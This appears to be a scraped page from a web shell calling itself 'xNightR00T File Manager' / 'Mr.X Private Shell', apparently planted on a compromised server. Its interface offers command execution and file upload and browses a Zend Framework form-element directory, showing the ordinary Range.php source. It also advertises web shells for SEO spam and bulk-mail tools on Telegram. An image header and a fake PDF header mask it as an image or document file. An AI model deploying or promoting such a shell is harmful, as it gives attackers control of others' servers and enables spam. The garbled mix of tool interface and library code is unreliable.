xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php
/**
 * Zend Framework (http://framework.zend.com/)
 *
 * @link      http://github.com/zendframework/zf2 for the canonical source repository
 * @copyright Copyright (c) 2005-2015 Zend Technologies USA Inc. (http://www.zend.com)
 * @license   http://framework.zend.com/license/new-bsd New BSD License
 */

namespace Zend\Form\Element;

use Zend\Form\Element\Number as NumberElement;
use Zend\I18n\Validator\IsFloat as NumberValidator;
use Zend\Validator\GreaterThan as GreaterThanValidator;
use Zend\Validator\LessThan as LessThanValidator;
use Zend\Validator\Step as StepValidator;

class Range extends NumberElement
{
    /**
     * Seed attributes
     *
     * @var array
     */
    protected $attributes = [
        'type' => 'range',
    ];

    /**
     * Get validator
     *
     * @return \Zend\Validator\ValidatorInterface[]
     */
    protected function getValidators()
    {
        if ($this->validators) {
            return $this->validators;
        }

        $validators = [];
        $validators[] = new NumberValidator();

        $inclusive = true;
        if (! empty($this->attributes['inclusive'])) {
            $inclusive = $this->attributes['inclusive'];
        }

        $validators[] = new GreaterThanValidator([
            'min'       => (isset($this->attributes['min'])) ? $this->attributes['min'] : 0,
            'inclusive' => $inclusive
        ]);

        $validators[] = new LessThanValidator([
            'max'       => (isset($this->attributes['max'])) ? $this->attributes['max'] : 100,
            'inclusive' => $inclusive
        ]);

        if (! isset($this->attributes['step'])
            || 'any' !== $this->attributes['step']
        ) {
            $validators[] = new StepValidator([
                'baseValue' => (isset($this->attributes['min'])) ? $this->attributes['min'] : 0,
                'step'      => (isset($this->attributes['step'])) ? $this->attributes['step'] : 1,
            ]);
        }

        $this->validators = $validators;
        return $this->validators;
    }
}

Filemanager

Name Type Size Permission Actions
Button.php File 532 B 0644
Captcha.php File 2.66 KB 0644
Checkbox.php File 4.87 KB 0644
Collection.php File 16.82 KB 0644
Color.php File 1.54 KB 0644
Csrf.php File 3.5 KB 0644
Date.php File 1.58 KB 0644
DateSelect.php File 4.89 KB 0644
DateTime.php File 6.17 KB 0644
DateTimeLocal.php File 1.38 KB 0644
DateTimeSelect.php File 8.6 KB 0644
Email.php File 3.69 KB 0644
File.php File 1.39 KB 0644
Hidden.php File 532 B 0644
Image.php File 530 B 0644
Month.php File 1.63 KB 0644
MonthSelect.php File 8.19 KB 0644
MultiCheckbox.php File 5.11 KB 0644
Number.php File 2.91 KB 0644
Password.php File 925 B 0644
Radio.php File 992 B 0644
Range.php File 2 KB 0644
Search.php File 532 B 0644
Select.php File 9.09 KB 0644
Submit.php File 532 B 0644
Tel.php File 1.53 KB 0644
Text.php File 528 B 0644
Textarea.php File 536 B 0644
Time.php File 1.35 KB 0644
Url.php File 1.54 KB 0644
Week.php File 2.51 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1